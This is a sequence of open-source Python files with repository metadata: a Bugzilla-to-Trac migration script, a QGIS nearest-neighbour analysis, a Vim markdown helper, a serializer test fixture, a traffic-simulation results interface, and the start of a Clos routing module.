% (filename, id, description))
attachment = Attachment(self.env, 'ticket', id)
attachment.author = author
attachment.description = description
attachment.insert(filename, filedata, filesize,
datetime2epoch(time))
del attachment
def getLoginName(self, cursor, userid):
if userid not in self.loginNameCache:
cursor.execute("SELECT * FROM profiles WHERE userid = %s", userid)
loginName = cursor.fetchall()
if loginName:
loginName = loginName[0]['login_name']
else:
print("WARNING: unknown bugzilla userid %d, recording as"
" anonymous" % userid)
loginName = "anonymous"
loginName = LOGIN_MAP.get(loginName, loginName)
self.loginNameCache[userid] = loginName
return self.loginNameCache[userid]
def getFieldName(self, cursor, fieldid):
if fieldid not in self.fieldNameCache:
# fielddefs.fieldid got changed to fielddefs.id in Bugzilla
# 2.23.3.
if BZ_VERSION >= 2233:
cursor.execute("SELECT * FROM fielddefs WHERE id = %s",
fieldid)
else:
cursor.execute("SELECT * FROM fielddefs WHERE fieldid = %s",
fieldid)
fieldName = cursor.fetchall()
if fieldName:
fieldName = fieldName[0]['name'].lower()
else:
print("WARNING: unknown bugzilla fieldid %d, "
" recording as unknown" % fieldid)
fieldName = "unknown"
self.fieldNameCache[fieldid] = fieldName
return self.fieldNameCache[fieldid]
def makeWhereClause(fieldName, values, negative=False):
if not values:
return ''
if negative:
connector, op = ' AND ', '!='
else:
connector, op = ' OR ', '='
clause = connector.join("%s %s '%s'" % (fieldName, op, value)
for value in values)
return ' (' + clause + ')'
def convert(_db, _host, _user, _password, _env, _force):
activityFields = FieldTranslator()
# account for older versions of bugzilla
print("Using Bugzilla v%s schema." % BZ_VERSION)
if BZ_VERSION == 2110:
activityFields['removed'] = "oldvalue"
activityFields['added'] = "newvalue"
# init Bugzilla environment
print("Bugzilla MySQL('%s':'%s':'%s':'%s'): connecting..."
% (_db, _host, _user, ("*" * len(_password))))
mysql_con = pymysql.connect(host=_host,
user=_user, passwd=_password, db=_db, compress=1,
cursorclass=pymysql.cursors.DictCursor,
charset='utf8')
mysql_cur = mysql_con.cursor()
# init Trac environment
print("Trac SQLite('%s'): connecting..." % _env)
trac = TracDatabase(_env)
# force mode...
if _force == 1:
print("\nCleaning all tickets...")
with trac.env.db_transaction as db:
db("DELETE FROM ticket_change")
db("DELETE FROM ticket")
db("DELETE FROM ticket_custom")
db("DELETE FROM attachment")
# Straight from the Python documentation.
for root, dirs, files in os.walk(trac.env.attachments_dir,
topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
if not os.stat(trac.env.attachments_dir):
os.mkdir(trac.env.attachments_dir)
print("All tickets cleaned...")
print("\n0. Filtering products...")
if BZ_VERSION >= 2180:
mysql_cur.execute("SELECT name FROM products")
else:
mysql_cur.execute("SELECT product AS name FROM products")
products = []
for line in mysql_cur.fetchall():
product = line['name']
if PRODUCTS and product not in PRODUCTS:
continue
if product in IGNORE_PRODUCTS:
continue
products.append(product)
PRODUCTS[:] = products
print(" Using products", " ".join(PRODUCTS))
print("\n1. Import severities...")
trac.setSeverityList(SEVERITIES)
print("\n2. Import components...")
if not COMPONENTS_FROM_PRODUCTS:
if BZ_VERSION >= 2180:
sql = """SELECT DISTINCT c.name AS name, c.initialowner AS owner
FROM components AS c, products AS p
WHERE c.product_id = p.id AND"""
sql += makeWhereClause('p.name', PRODUCTS)
else:
sql = "SELECT value AS name, initialowner AS owner FROM components"
sql += " WHERE" + makeWhereClause('program', PRODUCTS)
mysql_cur.execute(sql)
components = mysql_cur.fetchall()
for component in components:
component['owner'] = trac.getLoginName(mysql_cur,
component['owner'])
trac.setComponentList(components, 'name')
else:
if BZ_VERSION >= 2180:
sql = ("SELECT p.name AS product, c.name AS comp, "
" c.initialowner AS owner "
"FROM components c, products p "
"WHERE c.product_id = p.id AND" +
makeWhereClause('p.name', PRODUCTS))
else:
sql = ("SELECT program AS product, value AS comp, "
" initialowner AS owner "
"FROM components WHERE" +
makeWhereClause('program', PRODUCTS))
mysql_cur.execute(sql)
lines = mysql_cur.fetchall()
all_components = {} # product -> components
all_owners = {} # product, component -> owner
for line in lines:
product = line['product']
comp = line['comp']
owner = line['owner']
all_components.setdefault(product, []).append(comp)
all_owners[(product, comp)] = owner
component_list = []
for product, components in all_components.items():
# find best default owner
default = None
for comp in DEFAULT_COMPONENTS:
if comp in components:
default = comp
break
if default is None:
default = components[0]
owner = all_owners[(product, default)]
owner_name = trac.getLoginName(mysql_cur, owner)
component_list.append({'product': product, 'owner': owner_name})
trac.setComponentList(component_list, 'product')
print("\n3. Import priorities...")
trac.setPriorityList(PRIORITIES)
print("\n4. Import versions...")
if BZ_VERSION >= 2180:
sql = """SELECT DISTINCTROW v.value AS value
FROM products p, versions v"""
sql += " WHERE v.product_id = p.id AND"
sql += makeWhereClause('p.name', PRODUCTS)
else:
sql = "SELECT DISTINCTROW value FROM versions"
sql += " WHERE" + makeWhereClause('program', PRODUCTS)
mysql_cur.execute(sql)
versions = mysql_cur.fetchall()
trac.setVersionList(versions, 'value')
print("\n5. Import milestones...")
sql = "SELECT DISTINCT value FROM milestones"
sql += " WHERE" + makeWhereClause('value', IGNORE_MILESTONES, negative=True)
mysql_cur.execute(sql)
milestones = mysql_cur.fetchall()
trac.setMilestoneList(milestones, 'value')
print("\n6. Retrieving bugs...")
if BZ_VERSION >= 2180:
sql = """SELECT DISTINCT b.*, c.name AS component, p.name AS product
FROM bugs AS b, components AS c, products AS p """
sql += " WHERE" + makeWhereClause('p.name', PRODUCTS)
sql += " AND b.product_id = p.id"
sql += " AND b.component_id = c.id"
sql += " ORDER BY b.bug_id"
else:
sql = """SELECT DISTINCT b.*, c.value AS component, p.product AS product
FROM bugs AS b, components AS c, products AS p """
sql += " WHERE" + makeWhereClause('p.product', PRODUCTS)
sql += " AND b.product = p.product"
sql += " AND b.component = c.value"
sql += " ORDER BY b.bug_id"
mysql_cur.execute(sql)
bugs = mysql_cur.fetchall()
print("\n7. Import bugs and bug activity...")
for bug in bugs:
bugid = bug['bug_id']
ticket = {}
keywords = []
ticket['id'] = bugid
ticket['time'] = bug['creation_ts']
ticket['changetime'] = bug['delta_ts']
if COMPONENTS_FROM_PRODUCTS:
ticket['component'] = bug['product']
else:
ticket['component'] = bug['component']
if SEVERITIES:
ticket['severity'] = bug['bug_severity']
ticket['priority'] = bug['priority'].lower()
else:
# use bugzilla severities as trac priorities, and ignore bugzilla
# priorities
ticket['severity'] = ''
ticket['priority'] = bug['bug_severity']
ticket['owner'] = trac.getLoginName(mysql_cur, bug['assigned_to'])
ticket['reporter'] = trac.getLoginName(mysql_cur, bug['reporter'])
# pack bugzilla fields into dictionary of trac custom field
# names and values
customfields = {}
for bugfield, customfield in CUSTOMFIELD_MAP.iteritems():
customfields[customfield] = bug[bugfield]
ticket['customfields'] = customfields
mysql_cur.execute("SELECT * FROM cc WHERE bug_id = %s", bugid)
cc_records = mysql_cur.fetchall()
cc_list = []
for cc in cc_records:
cc_list.append(trac.getLoginName(mysql_cur, cc['who']))
cc_list = [cc for cc in cc_list if cc not in IGNORE_CC]
ticket['cc'] = string.join(cc_list, ', ')
ticket['version'] = bug['version']
target_milestone = bug['target_milestone']
if target_milestone in IGNORE_MILESTONES:
target_milestone = ''
ticket['milestone'] = target_milestone
bug_status = bug['bug_status'].lower()
ticket['status'] = statusXlator[bug_status]
ticket['resolution'] = bug['resolution'].lower()
# a bit of extra work to do open tickets
if bug_status == 'open':
if owner != '':
ticket['status'] = 'assigned'
else:
ticket['status'] = 'new'
ticket['summary'] = bug['short_desc']
mysql_cur.execute("SELECT * FROM longdescs WHERE bug_id = %s" % bugid)
longdescs = list(mysql_cur.fetchall())
# check for empty 'longdescs[0]' field...
if len(longdescs) == 0:
ticket['description'] = ''
else:
ticket['description'] = longdescs[0]['thetext']
del longdescs[0]
for desc in longdescs:
ignore = False
for comment in IGNORE_COMMENTS:
if re.match(comment, desc['thetext']):
ignore = True
if ignore:
continue
trac.addTicketComment(ticket=bugid,
time = desc['bug_when'],
author=trac.getLoginName(mysql_cur, desc['who']),
value = desc['thetext'])
mysql_cur.execute("""SELECT * FROM bugs_activity WHERE bug_id = %s
ORDER BY bug_when""" % bugid)
bugs_activity = mysql_cur.fetchall()
resolution = ''
ticketChanges = []
keywords = []
for activity in bugs_activity:
field_name = trac.getFieldName(mysql_cur, activity['fieldid']).lower()
removed = activity[activityFields['removed']]
added = activity[activityFields['added']]
# statuses and resolutions are in lowercase in trac
if field_name in ('resolution', 'bug_status'):
removed = removed.lower()
added = added.lower()
# remember most recent resolution, we need this later
if field_name == "resolution":
resolution = added.lower()
add_keywords = []
remove_keywords = []
# convert bugzilla field names...
if field_name == "bug_severity":
if SEVERITIES:
field_name = "severity"
else:
field_name = "priority"
elif field_name == "assigned_to":
field_name = "owner"
elif field_name == "bug_status":
field_name = "status"
if removed in STATUS_KEYWORDS:
remove_keywords.append(STATUS_KEYWORDS[removed])
if added in STATUS_KEYWORDS:
add_keywords.append(STATUS_KEYWORDS[added])
added = statusXlator[added]
removed = statusXlator[removed]
elif field_name == "short_desc":
field_name = "summary"
elif field_name == "product" and COMPONENTS_FROM_PRODUCTS:
field_name = "component"
elif ((field_name == "product" and not COMPONENTS_FROM_PRODUCTS) or
(field_name == "component" and COMPONENTS_FROM_PRODUCTS)):
if MAP_ALL_KEYWORDS or removed in KEYWORDS_MAPPING:
kw = KEYWORDS_MAPPING.get(removed, removed)
if kw:
remove_keywords.append(kw)
if MAP_ALL_KEYWORDS or added in KEYWORDS_MAPPING:
kw = KEYWORDS_MAPPING.get(added, added)
if kw:
add_keywords.append(kw)
if field_name == "component":
# just keep the keyword change
added = removed = ""
elif field_name == "target_milestone":
field_name = "milestone"
if added in IGNORE_MILESTONES:
added = ""
if removed in IGNORE_MILESTONES:
removed = ""
ticketChange = {}
ticketChange['ticket'] = bugid
ticketChange['time'] = activity['bug_when']
ticketChange['author'] = trac.getLoginName(mysql_cur,
activity['who'])
ticketChange['field'] = field_name
ticketChange['oldvalue'] = removed
ticketChange['newvalue'] = added
if add_keywords or remove_keywords:
# ensure removed ones are in old
old_keywords = keywords + [kw for kw in remove_keywords if kw
not in keywords]
# remove from new
keywords = [kw for kw in keywords if kw not in remove_keywords]
# add to new
keywords += [kw for kw in add_keywords if kw not in keywords]
if old_keywords != keywords:
ticketChangeKw = ticketChange.copy()
ticketChangeKw['field'] = "keywords"
ticketChangeKw['oldvalue'] = ' '.join(old_keywords)
ticketChangeKw['newvalue'] = ' '.join(keywords)
ticketChanges.append(ticketChangeKw)
if field_name in IGNORED_ACTIVITY_FIELDS:
continue
# Skip changes that have no effect (think translation!).
if added == removed:
continue
# Bugzilla splits large summary changes into two records.
for oldChange in ticketChanges:
if (field_name == "summary"
and oldChange['field'] == ticketChange['field']
and oldChange['time'] == ticketChange['time']
and oldChange['author'] == ticketChange['author']):
oldChange['oldvalue'] += " " + ticketChange['oldvalue']
oldChange['newvalue'] += " " + ticketChange['newvalue']
break
# cc and attachments.isobsolete sometime appear
# in different activities with same time
if field_name in ('cc', 'attachments.isobsolete') and \
oldChange['time'] == ticketChange['time']:
oldChange['newvalue'] += ", " + ticketChange['newvalue']
break
else:
ticketChanges.append (ticketChange)
for ticketChange in ticketChanges:
trac.addTicketChange (**ticketChange)
# For some reason, bugzilla v2.11 seems to clear the resolution
# when you mark a bug as closed. Let's remember it and restore
# it if the ticket is closed but there's no resolution.
if not ticket['resolution'] and ticket['status'] == "closed":
ticket['resolution'] = resolution
bug_status = bug['bug_status']
if bug_status in STATUS_KEYWORDS:
kw = STATUS_KEYWORDS[bug_status]
if kw not in keywords:
keywords.append(kw)
product = bug['product']
if product in KEYWORDS_MAPPING and not COMPONENTS_FROM_PRODUCTS:
kw = KEYWORDS_MAPPING.get(product, product)
if kw and kw not in keywords:
keywords.append(kw)
component = bug['component']
if (COMPONENTS_FROM_PRODUCTS and
(MAP_ALL_KEYWORDS or component in KEYWORDS_MAPPING)):
kw = KEYWORDS_MAPPING.get(component, component)
if kw and kw not in keywords:
keywords.append(kw)
ticket['keywords'] = string.join(keywords)
ticketid = trac.addTicket(**ticket)
if BZ_VERSION >= 2210:
mysql_cur.execute("SELECT attachments.*, attach_data.thedata "
"FROM attachments, attach_data "
"WHERE attachments.bug_id = %s AND "
"attachments.attach_id = attach_data.id" % bugid)
else:
mysql_cur.execute("SELECT * FROM attachments WHERE bug_id = %s" %
bugid)
attachments = mysql_cur.fetchall()
for a in attachments:
author = trac.getLoginName(mysql_cur, a['submitter_id'])
trac.addAttachment(author, a)
print("\n8. Importing users and passwords...")
if BZ_VERSION >= 2164:
selectlogins = "SELECT login_name, cryptpassword FROM profiles"
if IGNORE_DISABLED_USERS:
selectlogins = selectlogins + " WHERE disabledtext=''"
mysql_cur.execute(selectlogins)
users = mysql_cur.fetchall()
else:
users = ()
with open('htpasswd', 'w') as f:
for user in users:
if user['login_name'] in LOGIN_MAP:
login = LOGIN_MAP[user['login_name']]
else:
login = user['login_name']
f.write(login + ':' + user['cryptpassword'] + '\n')
print(" Bugzilla users converted to htpasswd format, see 'htpasswd'.")
print("\nAll tickets converted.")
def log(msg):
print("DEBUG: %s" % msg)
def datetime2epoch(dt) :
import time
return time.mktime(dt.timetuple()) * 1000000
def usage():
print("""bugzilla2trac - Imports a bug database from Bugzilla into Trac.
Usage: bugzilla2trac.py [options]
Available Options:
--db <MySQL dbname> - Bugzilla's database name
--tracenv /path/to/trac/env - Full path to Trac db environment
-h | --host <MySQL hostname> - Bugzilla's DNS host name
-u | --user <MySQL username> - Effective Bugzilla's database user
-p | --passwd <MySQL password> - Bugzilla's user password
-c | --clean - Remove current Trac tickets before
importing
-n | --noseverities - import Bugzilla severities as Trac
priorities and forget Bugzilla priorities
--help | help - This help info
Additional configuration options can be defined directly in the script.
""")
sys.exit(0)
def main():
global BZ_DB, BZ_HOST, BZ_USER, BZ_PASSWORD, TRAC_ENV, TRAC_CLEAN
global SEVERITIES, PRIORITIES, PRIORITIES_MAP
if len (sys.argv) > 1:
if sys.argv[1] in ['--help','help'] or len(sys.argv) < 4:
usage()
iter = 1
while iter < len(sys.argv):
if sys.argv[iter] in ['--db'] and iter+1 < len(sys.argv):
BZ_DB = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-h', '--host'] and iter+1 < len(sys.argv):
BZ_HOST = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-u', '--user'] and iter+1 < len(sys.argv):
BZ_USER = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-p', '--passwd'] and iter+1 < len(sys.argv):
BZ_PASSWORD = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['--tracenv'] and iter+1 < len(sys.argv):
TRAC_ENV = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-c', '--clean']:
TRAC_CLEAN = 1
elif sys.argv[iter] in ['-n', '--noseverities']:
# treat Bugzilla severites as Trac priorities
PRIORITIES = SEVERITIES
SEVERITIES = []
PRIORITIES_MAP = {}
else:
print("Error: unknown parameter: " + sys.argv[iter])
sys.exit(0)
iter = iter + 1
convert(BZ_DB, BZ_HOST, BZ_USER, BZ_PASSWORD, TRAC_ENV, TRAC_CLEAN)
if __name__ == '__main__':
main()
|
rbaumg/trac
|
contrib/bugzilla2trac.py
|
Python
|
bsd-3-clause
| 36,535
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
NearestNeighbourAnalysis.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import math
from qgis.core import QgsFeatureRequest, QgsFeature, QgsDistanceArea
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputHTML
from processing.core.outputs import OutputNumber
from processing.tools import dataobjects, vector
class NearestNeighbourAnalysis(GeoAlgorithm):
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
OBSERVED_MD = 'OBSERVED_MD'
EXPECTED_MD = 'EXPECTED_MD'
NN_INDEX = 'NN_INDEX'
POINT_COUNT = 'POINT_COUNT'
Z_SCORE = 'Z_SCORE'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Nearest neighbour analysis')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POINTS,
self.tr('Points'), [ParameterVector.VECTOR_TYPE_POINT]))
self.addOutput(OutputHTML(self.OUTPUT, self.tr('Nearest neighbour')))
self.addOutput(OutputNumber(self.OBSERVED_MD,
self.tr('Observed mean distance')))
self.addOutput(OutputNumber(self.EXPECTED_MD,
self.tr('Expected mean distance')))
self.addOutput(OutputNumber(self.NN_INDEX,
self.tr('Nearest neighbour index')))
self.addOutput(OutputNumber(self.POINT_COUNT,
self.tr('Number of points')))
self.addOutput(OutputNumber(self.Z_SCORE, self.tr('Z-Score')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
output = self.getOutputValue(self.OUTPUT)
spatialIndex = vector.spatialindex(layer)
neighbour = QgsFeature()
distance = QgsDistanceArea()
sumDist = 0.00
A = layer.extent()
A = float(A.width() * A.height())
current = 0
features = vector.features(layer)
count = len(features)
total = 100.0 / float(len(features))
for feat in features:
neighbourID = spatialIndex.nearestNeighbor(
feat.geometry().asPoint(), 2)[1]
request = QgsFeatureRequest().setFilterFid(neighbourID)
neighbour = layer.getFeatures(request).next()
sumDist += distance.measureLine(neighbour.geometry().asPoint(),
feat.geometry().asPoint())
current += 1
progress.setPercentage(int(current * total))
do = float(sumDist) / count
de = float(0.5 / math.sqrt(count / A))
d = float(do / de)
SE = float(0.26136 / math.sqrt(count ** 2 / A))
zscore = float((do - de) / SE)
data = []
data.append('Observed mean distance: ' + unicode(do))
data.append('Expected mean distance: ' + unicode(de))
data.append('Nearest neighbour index: ' + unicode(d))
data.append('Number of points: ' + unicode(count))
data.append('Z-Score: ' + unicode(zscore))
self.createHTML(output, data)
self.setOutputValue(self.OBSERVED_MD, float(data[0].split(': ')[1]))
self.setOutputValue(self.EXPECTED_MD, float(data[1].split(': ')[1]))
self.setOutputValue(self.NN_INDEX, float(data[2].split(': ')[1]))
self.setOutputValue(self.POINT_COUNT, float(data[3].split(': ')[1]))
self.setOutputValue(self.Z_SCORE, float(data[4].split(': ')[1]))
def createHTML(self, outputFile, algData):
f = open(outputFile, 'w')
for s in algData:
f.write('<p>' + str(s) + '</p>')
f.close()
|
michaelkirk/QGIS
|
python/plugins/processing/algs/qgis/NearestNeighbourAnalysis.py
|
Python
|
gpl-2.0
| 4,670
|
from pycmark.taggedtext.render.VimRenderer import VimRenderer, StringIO
from pycmark.util.TypedTree import TypedTree
from pycmark.taggedtext.TaggedCmarkDocument import TaggedTextDocument
class VimHandler(object):
"""Helper class for vim operations"""
# header text for table of contents window
TOCHEADER = [
'{TAB: switch windows',
'{ENTER: follow link',
'{Ctrl-]: follow links',
'{Ctrl-R: resize',
'{Ctrl-T: toggle TOC',
'{za: toggle TOC fold',
'',
'Contents'
]
def __init__(self, vim):
self.vim = vim # reference to vim module
self.tocBuffer = None # buffer number for table of contents
self.contentBuffer = None # buffer number for rendered markdown
self.renderer = VimRenderer() # rendering object
def parseJSON(self):
inData = '\n'.join(self.vim.current.buffer)
if TypedTree._isSeralizedData(inData):
try:
self.tt = TypedTree._fromjson(inData)
except:
self.vim.command('let g:json_load_ok = 0')
return
self.inData = inData
self.vim.command('only') # ???
self.vim.command('bd') # ???
self.contentBuffer = self.vim.current.buffer.number
for line in self.renderer.genStyle().split('\n'):
self.vim.command(line)
self.vim.command('let g:json_load_ok = 1')
else:
self.vim.command('let g:json_load_ok = 0')
return
def RenderText(self):
contentWindow = [w for w in self.vim.windows if w.buffer.number == self.contentBuffer][0]
nCols = int(contentWindow.width) - int(contentWindow.options['numberwidth'])
buf = StringIO()
doc = TaggedTextDocument.fromAST(self.tt, width=min(nCols, 100))
doc.render(self.renderer.render, writer=buf)
renderedLines = buf.getvalue().split('\n')
self.vim.buffers[self.contentBuffer].options['modifiable'] = True
self.vim.buffers[self.contentBuffer][:] = renderedLines
self.vim.buffers[self.contentBuffer].options['buftype'] = 'nofile'
self.vim.buffers[self.contentBuffer].options['modifiable'] = False
def RenderTOC(self):
self.tree, self.rawfolds, self.folds = self.renderer.getTOC(self.tt, offset=1+len(self.TOCHEADER))
self.vim.current.buffer[:] = self.TOCHEADER + self.tree
for f in self.folds:
self.vim.command('%d,%dfold | normal zR' % f)
for line in self.renderer.genTreeStyle().split('\n'):
self.vim.command(line)
def GenerateFolds(self):
headings = [i for i, b in enumerate(self.vim.current.buffer) if b.startswith('<heading>') and '</heading>' in b]
contentIndices = headings + [len(self.vim.current.buffer)]
if len(headings) > 0:
for a, b in [(i, dict(self.rawfolds).get(i, i)) for i in range(len(self.tree))]:
self.vim.command('%d,%dfold | normal zR' % (contentIndices[a] + 1, contentIndices[b + 1]))
|
daryl314/markdown-browser
|
pycmark/vim/VimHandler.py
|
Python
|
mit
| 3,108
|
import mock
import pytest
from pyleus.storm.serializers.serializer import Serializer
class SerializerTestCase(object):
INSTANCE_CLS = Serializer
@pytest.fixture(autouse=True)
def instance_fixture(self):
self.mock_input_stream = mock.Mock()
self.mock_output_stream = mock.Mock()
self.instance = self.INSTANCE_CLS(
input_stream=self.mock_input_stream,
output_stream=self.mock_output_stream,
)
|
ecanzonieri/pyleus
|
testing/serializer.py
|
Python
|
apache-2.0
| 464
|
from SimulationDAO import *
from constants import *
from DAO import VehiclesDAO
from util import *
import json
import gviz_api
class SimulationExecutionInterface (object):
def __init__(self, sim_exec_id, sim_id):
self.id = sim_exec_id
self.sim_id = sim_id
def getSimulationExecutionDetails(self):
return getSimulationExecutionDetails(self.id)
def getSimulationResult(self):
description = {"count": ("string", "Number of Vehicles"),
"waittime": ("number", "Avg. Wait Time in secs"),
"type": ("string", "Vehicle Type"),
"speed": ("string", "Avg. Speed in mph")}
# get data
loop_data = getSimulationResultByVehicleType(self.id)
# get all vehicle types
sim_id = self.sim_id
vehicle_dao = VehiclesDAO()
vehicle_types = vehicle_dao.readVehicles(str(sim_id))
vehicle_dict = {}
for vehicle in vehicle_types:
vehicle_dict[str(vehicle["_id"])] = vehicle["name"]
data = []
total_vehicles = 0
weighted_speed = 0
total_waittime = 0
#loop through result set and aggregate data to add sum for all vehicle types
for row in loop_data['result']:
vehicle_data = {}
# should not happen, only for experiments
if vehicle_dict.get(row["_id"]) is None:
vehicle_data["type"] = row["_id"]
else:
vehicle_data["type"] = vehicle_dict[row["_id"]]
vehicle_data["speed"] = round(row["speed"], 2)
# calculate average wait time from total
vehicle_data["waittime"] = round(row["waittime"]*1.0/row["count"], 2)
vehicle_data["count"] = row["count"]
total_vehicles += vehicle_data["count"]
weighted_speed += vehicle_data["speed"]*vehicle_data["count"]
total_waittime += row["waittime"]
data.append(vehicle_data)
# add the total row
if total_vehicles != 0:
vehicle_data = {}
vehicle_data["type"] = "All"
vehicle_data["speed"] = round(weighted_speed/total_vehicles, 2)
vehicle_data["waittime"] = round(total_waittime/total_vehicles, 2)
vehicle_data["count"] = total_vehicles
data.append(vehicle_data)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
return_data = json.loads(data_table.ToJSon(columns_order=("type", "speed", "waittime", "count"),
order_by="type"))
return return_data
def getInductionLoopResult(self, loop_id, flow_rate_agg):
duration = getSimulationDuration(self.id)
return_data = duration
all_vehicle_types = getDistinctSimulatedVehicleList(self.id, loop_id)
description = {"endtime": ("number", "Time Step")}
# no data is present, retur
if len(all_vehicle_types) == 0:
description["vehicletype"] = ("number", "Default")
data_table = gviz_api.DataTable(description)
return_data['chart_data'] = data_table.ToJSon()
return return_data
loop_data = getSimulationInducionLoopResult(self.id, loop_id)
aggregation_interval = int(flow_rate_agg)
present_step = aggregation_interval
data = []
vehicle_type_dict = {}
col_order = ("endtime",)
for vehicle_type in all_vehicle_types:
description[vehicle_type] = ("number", vehicle_type)
col_order += (vehicle_type,)
description['All'] = ("number", 'All')
col_order += ('All',)
for row in loop_data:
# will be 10 initially
if row["endtime"] <= present_step:
if vehicle_type_dict.get(row["vehicletype"]) is None:
vehicle_type_dict[row["vehicletype"]] = row["count"]
else:
vehicle_type_dict[row["vehicletype"]] += row["count"]
# Add entry for all vehicles
if vehicle_type_dict.get('All') is None:
vehicle_type_dict['All'] = row["count"]
else:
vehicle_type_dict['All'] += row["count"]
else:
# add an entry
aggregate_row = {}
# this should be 11, 21 etc.
aggregate_row["endtime"] = present_step
for vehicle in all_vehicle_types:
if vehicle_type_dict.get(vehicle) is None:
aggregate_row[vehicle] = 0
else:
aggregate_row[vehicle] = vehicle_type_dict[vehicle]
aggregate_row['All'] = vehicle_type_dict.get('All')
data.append(aggregate_row)
# reset the dictionary
vehicle_type_dict = {}
present_step += aggregation_interval
while (row["endtime"] > present_step):
aggregate_row = {}
aggregate_row["endtime"] = present_step
for vehicle in all_vehicle_types:
aggregate_row[vehicle] = 0
data.append(aggregate_row)
present_step += aggregation_interval
aggregate_row['All'] = 0
if vehicle_type_dict.get(row["vehicletype"]) is None:
vehicle_type_dict[row["vehicletype"]] = row["count"]
else:
vehicle_type_dict[row["vehicletype"]] += row["count"]
# Add entry for all vehicles
if vehicle_type_dict.get('All') is None:
vehicle_type_dict['All'] = row["count"]
else:
vehicle_type_dict['All'] += row["count"]
# add the last interval
aggregate_row = {}
aggregate_row["endtime"] = row["endtime"]
if len(vehicle_type_dict) is not 0:
for vehicle in all_vehicle_types:
if vehicle_type_dict.get(vehicle) is None:
aggregate_row[vehicle] = 0
else:
aggregate_row[vehicle] = vehicle_type_dict[vehicle]
if vehicle_type_dict.get('All') is None:
aggregate_row['All'] = 0
else:
aggregate_row['All'] = vehicle_type_dict['All']
data.append(aggregate_row)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
chart_data = data_table.ToJSon(columns_order=col_order,
order_by="endtime")
return_data["chart_data"] = chart_data
return return_data
def getQueueResult(self, loop_id):
description = {"_id": ("number", "Time Step"),
"queueinglength": ("number", "Queue Length")}
data = getSimulationQueueResult(self.id, loop_id)
duration = getSimulationDuration(self.id)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data['result'])
return_data = duration
chart_data = data_table.ToJSon(columns_order=("_id", "queueinglength"),
order_by="_id")
return_data["chart_data"] = chart_data
return return_data
def getInductionDataTable(self, loop_id):
description = {"property": ("string", "Property"),
"value": ("number", "Value")}
idparts = loop_id.split("!")
location_field = idparts[0]
junction_id = idparts[1]
data = []
flow_data = getSimulationInductionFlowRate(self.id, location_field, junction_id)
# should be single row
for flow_row in flow_data['result']:
row = {}
row["property"] = "Number of Vehicles"
row["value"] = flow_row['vehiclecount']
data.append(row)
row = {}
row["property"] = "Flow Rate (Vehicles/s)"
row["value"] = round(flow_row['vehiclecount']*1.0/flow_row['endtime'],3)
data.append(row)
if idparts[0][-2:] == "in":
# get lanes adjascent to the loop_id
adjascent_routes_data = getAdjascentLanes(location_field, junction_id)
lane = adjascent_routes_data[location_field]
adjascent_route_field = location_field + "_adjascent"
adjascent_routes = adjascent_routes_data[adjascent_route_field]
left_lane = adjascent_routes[0]
straight_lane = adjascent_routes[1]
right_lane = adjascent_routes[2]
all_routes_data = getSimulatedVehicleRoutes(self.id)
left = 0
straight = 0
right = 0
for route_row in all_routes_data:
route = route_row['route']
length = len(route)
pos = 0
# only need to check till second last
while pos < length - 1:
# found the lane for the vehicle
if route[pos] == lane:
# check next matches any adjascent lanes
if (route[pos + 1] == left_lane):
left += 1
elif (route[pos + 1] == straight_lane):
straight += 1
elif (route[pos + 1] == right_lane):
right += 1
pos += 1
row = {}
row["property"] = "Vehicles Turning Left"
row["value"] = left
data.append(row)
row = {}
row["property"] = "Vehicles Moving Straight"
row["value"] = straight
data.append(row)
row = {}
row["property"] = "Vehicles Turning Right"
row["value"] = right
data.append(row)
queue_data = getSimulationInductionQueueResult(self.id, location_field, junction_id)
# should be single row
for queue_row in queue_data['result']:
row = {}
row["property"] = "Average Queue Length in ft"
row["value"] = round(queue_row['queueinglength'], 2)
data.append(row)
row = {}
row["property"] = "Max Queue Duration in secs"
row["value"] = queue_row['maxqueueduration']
data.append(row)
row = {}
row["property"] = "Total Queue Duration in secs"
row["value"] = queue_row['count']
data.append(row)
row = {}
row["property"] = "Total Queue Length in ft"
row["value"] = round(queue_row['totalqueueinglength'], 2)
#print queue_row['totalqueueinglength']
#print queue_row['endtime']
data.append(row)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
return_data = json.loads(data_table.ToJSon(columns_order=("property", "value"),
order_by="property"))
return return_data
|
shekharshank/c2sumo
|
src/C3STEM/Middleware/SimulationExecutionInterface.py
|
Python
|
mit
| 9,780
|
# Copyright 2021 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
deepmind/deepmind-research
|
box_arrangement/__init__.py
|
Python
|
apache-2.0
| 594
|
# Clos Routing and Generation
import math
import random
import sys
def route_clos(routing_vector,I,k,N):
#In the current tested state, I+N must be divisible by k
